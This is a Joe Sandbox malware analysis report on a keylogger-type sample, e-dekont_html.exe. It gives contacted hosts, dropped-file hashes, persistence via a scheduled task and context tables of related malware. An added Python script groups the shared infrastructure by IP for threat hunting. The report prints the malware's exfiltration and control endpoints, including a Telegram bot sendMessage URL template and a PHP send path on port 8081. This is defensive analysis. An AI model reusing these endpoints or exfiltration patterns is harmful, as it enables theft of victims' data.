http://www.fontbureau.com | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://checkip.dyndns.org | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.office.com/lBfq | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000348F000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.carterandcone.coml | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://aborters.duckdns.org:8081 | e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fontbureau.com/designers/cabarga.htmlN | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.founder.com.cn/cn | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fontbureau.com/designers/frere-user.html | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://anotherarmy.dns.army:8081 | e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.jiyu-kobo.co.jp/ | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fontbureau.com/designers8 | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | e-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmp | false |
                                                                                                                              high
                                                                                                                              https://chrome.google.com/webstore?hl=enX~e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.office.com/X~e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodede-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559103
Start date and time: 2024-11-20 07:51:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: e-dekont_html.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/15@4/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 340
• Number of non-executed functions: 12
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target e-dekont_html.exe, PID 7308 because it is empty
• Execution Graph export aborted for target fahKSvwo.exe, PID 7696 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
01:52:05 | API Interceptor | 7784949x Sleep call for process: e-dekont_html.exe modified
01:52:09 | API Interceptor | 80x Sleep call for process: powershell.exe modified
01:52:11 | API Interceptor | 5225168x Sleep call for process: fahKSvwo.exe modified
06:52:10 | Task Scheduler | Run new task: fahKSvwo path: C:\Users\user\AppData\Roaming\fahKSvwo.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown |
149.154.167.220 | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | file.exe | malicious | Ailurophile Stealer |
149.154.167.220 | INQUIRY_pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | P.O 423737.exe | malicious | MassLogger RAT |
149.154.167.220 | z30ProofofPaymentAttached.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY | malicious | HTMLPhisher |
149.154.167.220 | Fac.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | New Order Data sheet Page.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | Factura Honorarios 2024-11-17.exe | malicious | GuLoader, Snake Keylogger |
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check
188.114.97.3 | View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm | malicious | Unknown | f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
188.114.97.3 | SWIFT 103 202414111523339800 111124.pdf.vbs | malicious | Remcos | paste.ee/d/YU1NN
188.114.97.3 | TT copy.exe | malicious | FormBook | www.lnnn.fun/u5w9/
188.114.97.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/iiEh1iM3/download
188.114.97.3 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | paste.ee/d/dc8Ru
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown | 188.114.96.3
reallyfreegeoip.org | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Ref#501032.vbe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | rPO_1079021908.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | INQUIRY_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | P.O 423737.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | Kayla Dennis CV.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | PROFORMA + PENDENTES.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | z30ProofofPaymentAttached.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
checkip.dyndns.com | REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown | 132.226.247.73
checkip.dyndns.com | REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown | 132.226.247.73
checkip.dyndns.com | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | Company catalog profile.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | Ref#501032.vbe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | Quote GVSE24-00815.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | Payment_transaction.exe | malicious | MassLogger RAT | 132.226.247.73
checkip.dyndns.com | nowe zam#U00f3wienie.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | rPO_1079021908.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | INQUIRY_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
api.telegram.org | REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | file.exe | malicious | Ailurophile Stealer | 149.154.167.220
api.telegram.org | INQUIRY_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | P.O 423737.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | z30ProofofPaymentAttached.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | Fac.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | New Order Data sheet Page.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | Factura Honorarios 2024-11-17.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Match (ASN) / Associated Sample Name or URL | Detection | Threat Name | Context (contacted IP)

Match: TELEGRAMRU
  REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown | 149.154.167.220
  Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  file.exe | malicious | Ailurophile Stealer | 149.154.167.220
  INQUIRY_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  P.O 423737.exe | malicious | MassLogger RAT | 149.154.167.220
  z30ProofofPaymentAttached.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY | malicious | HTMLPhisher | 149.154.167.220
  Fac.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
  New Order Data sheet Page.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
  Factura Honorarios 2024-11-17.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220

Match: CLOUDFLARENETUS
  globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 104.21.91.199
  file.exe | malicious | LummaC | 188.114.97.3
  file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 188.114.97.3
  file.exe | malicious | LummaC | 188.114.96.3
  vessel details_pdf.exe | malicious | AgentTesla | 104.26.12.205
  MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exe | malicious | AgentTesla | 104.26.13.205
  https://cdn-defac21.artcollective-snapclick.com/api/reg/update.json | malicious | Unknown | 104.21.78.162
  file.exe | malicious | LummaC | 104.21.85.146
  file.exe | malicious | LummaC | 188.114.97.3
  https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29t | malicious | Unknown | 188.114.96.3

Match: CLOUDFLARENETUS
  globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 104.21.91.199
  file.exe | malicious | LummaC | 188.114.97.3
  file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 188.114.97.3
  file.exe | malicious | LummaC | 188.114.96.3
  vessel details_pdf.exe | malicious | AgentTesla | 104.26.12.205
  MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exe | malicious | AgentTesla | 104.26.13.205
  https://cdn-defac21.artcollective-snapclick.com/api/reg/update.json | malicious | Unknown | 104.21.78.162
  file.exe | malicious | LummaC | 104.21.85.146
  file.exe | malicious | LummaC | 188.114.97.3
  https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29t | malicious | Unknown | 188.114.96.3

Match: ORACLE-BMC-31898US
  Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  Company catalog profile.exe | malicious | MassLogger RAT | 158.101.44.242
  Quote GVSE24-00815.exe | malicious | MassLogger RAT | 158.101.44.242
  Payment_transaction.exe | malicious | MassLogger RAT | 158.101.44.242
  nowe zam#U00f3wienie.exe | malicious | Snake Keylogger | 158.101.44.242
  rPO_1079021908.exe | malicious | MassLogger RAT | 158.101.44.242
  owari.arm7.elf | malicious | Mirai | 129.146.156.151
  P.O 423737.exe | malicious | MassLogger RAT | 193.122.130.0
  PROFORMA + PENDENTES.exe | malicious | Snake Keylogger | 158.101.44.242
  QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 193.122.6.168

Match (JA3 fingerprint) / Associated Sample Name or URL | Detection | Threat Name | Context (contacted IP)

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  Benefit Enrollment -wZ5nusm.pdf | malicious | Unknown | 188.114.97.3
  REPLY TO NOTICE GST DRC-1A_pdf.exe | malicious | Unknown | 188.114.97.3
  Ref#501032.vbe | malicious | MassLogger RAT | 188.114.97.3
  rPO_1079021908.exe | malicious | MassLogger RAT | 188.114.97.3
  INQUIRY_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  P.O 423737.exe | malicious | MassLogger RAT | 188.114.97.3
  Kayla Dennis CV.exe | malicious | Snake Keylogger | 188.114.97.3
  PROFORMA + PENDENTES.exe | malicious | Snake Keylogger | 188.114.97.3
  QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.97.3
  z30ProofofPaymentAttached.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3

Match: 3b5074b1b5d032e5620f69f9f700ff0e
  globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 149.154.167.220
  https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/preview | malicious | Unknown | 149.154.167.220
  vessel details_pdf.exe | malicious | AgentTesla | 149.154.167.220
  MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exe | malicious | AgentTesla | 149.154.167.220
  file.exe | malicious | LummaC | 149.154.167.220
  file.exe | malicious | LummaC | 149.154.167.220
  file.exe | malicious | LummaC | 149.154.167.220
  file.exe | malicious | LummaC | 149.154.167.220
  https://s.id/sharedocument | malicious | Unknown | 149.154.167.220
  https://trackru.top/us | malicious | Unknown | 149.154.167.220
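The ASN and JA3 context tables above are the report's infrastructure-overlap view: the same Telegram API address (149.154.167.220) and the same Cloudflare-fronted addresses recur across many other Snake Keylogger, MassLogger, AgentTesla and LummaC submissions. The Python below is an added example, not part of the Joe Sandbox report, that parses rows in the flattened form a text extraction of the HTML report produces and pivots them by contacted IP. The embedded rows and the list of match keys are a constructed subset copied from this page; the row layout ("<sample>Get hash<detection><threat>Browse" followed by a "• <ip>" line, with the Match key fused to the first sample of each block) is an assumption about that extraction, not a documented Joe Sandbox export format.

```python
import re
from collections import defaultdict

# Constructed input: a handful of context rows copied from this report in the
# flattened form a text extraction of the HTML produces. Each block starts with
# the Match key (ASN name or JA3 hash) fused to the first sample name; every
# sample row reads "<sample>Get hash<detection><threat>Browse" and is followed
# by one "• <ip>" line. This is a subset of the page's tables, not the full set.
RAW_CONTEXT = """\
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
TELEGRAMRUREPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
• 149.154.167.220
Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
• 149.154.167.220
CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
• 188.114.97.3
vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
• 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0evessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
• 149.154.167.220
file.exeGet hashmaliciousLummaCBrowse
• 149.154.167.220
"""

# Match keys taken from the report's ASN and JA3 tables. The parser needs them
# because the extraction fuses the key to the first sample name of each block.
MATCH_KEYS = (
    "TELEGRAMRU",
    "CLOUDFLARENETUS",
    "ORACLE-BMC-31898US",
    "54328bd36c14bd82ddaa0c04b25ed9ad",
    "3b5074b1b5d032e5620f69f9f700ff0e",
)

# "Get hash" and "Browse" are the button labels that delimit the columns.
ROW_RE = re.compile(r"^(?P<sample>.+?)Get hash(?P<detection>[a-z]+)(?P<threat>.*?)Browse$")
IP_RE = re.compile(r"^•\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")


def parse_context(raw, match_keys=MATCH_KEYS):
    """Turn flattened context rows into dicts with match, sample, detection, threat and ip."""
    records, current_match, pending = [], None, None
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.startswith("MatchAssociated"):
            continue  # blank line or the table header
        ip_match = IP_RE.match(line)
        if ip_match:
            if pending is None:
                raise ValueError(f"IP line without a preceding sample row: {line}")
            pending["ip"] = ip_match["ip"]
            records.append(pending)
            pending = None
            continue
        # Longest key first so that no key is mistaken for a prefix of another.
        for key in sorted(match_keys, key=len, reverse=True):
            if line.startswith(key):
                current_match, line = key, line[len(key):]
                break
        row = ROW_RE.match(line)
        if row is None:
            raise ValueError(f"unrecognised row: {line}")
        pending = {"match": current_match, **row.groupdict()}
    return records


def pivot_by_ip(records):
    """Group by contacted IP: which match keys, samples and malware families share it."""
    by_ip = defaultdict(lambda: {"matches": set(), "samples": set(), "threats": set()})
    for rec in records:
        entry = by_ip[rec["ip"]]
        entry["matches"].add(rec["match"])
        entry["samples"].add(rec["sample"])
        for family in rec["threat"].split(","):
            family = family.strip()
            if family and family != "Unknown":
                entry["threats"].add(family)
    return dict(by_ip)


def shared_infrastructure(by_ip):
    """IPs that show up under more than one match key: the pivot points worth hunting on."""
    return sorted(ip for ip, entry in by_ip.items() if len(entry["matches"]) > 1)


if __name__ == "__main__":
    pivot = pivot_by_ip(parse_context(RAW_CONTEXT))
    for ip in shared_infrastructure(pivot):
        entry = pivot[ip]
        print(ip, sorted(entry["matches"]), sorted(entry["threats"]))
```

A caveat when using the result: 149.154.167.220 is a Telegram API front end shared by benign clients and by every family that exfiltrates over Telegram, so an overlap on that IP alone says little about attribution; the JA3 fingerprint seen together with the ASN, or the bot token and chat ID in the extracted configuration, is the stronger pivot.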
                                                                                                                                                        No context
Process: C:\Users\user\Desktop\e-dekont_html.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\AppData\Roaming\fahKSvwo.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380134126512796
Encrypted: false
SSDEEP: 48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:+LHxvIIwLgZ2KRHWLOuggs
MD5: 2A51987DAFE4586D09FC4BE0507F6B71
SHA1: AE3D26F5D8A78CB88E29ADEC340C56A0F6B3D3B7
SHA-256: 2EBC59B6B9D301FBFDD52FA8CF1C811F7814C4F24943D6BC3F5FD7B8529F8D16
SHA-512: F1D8BFF693D16BEEE9D0C06CEA7CD925CACB33170201A35BC01099BA4225BB26EAE347213F9C29DF3E320CE0DD1D299D5B735D089145EE1E188A8024F62F78C3
                                                                                                                                                        Malicious:false
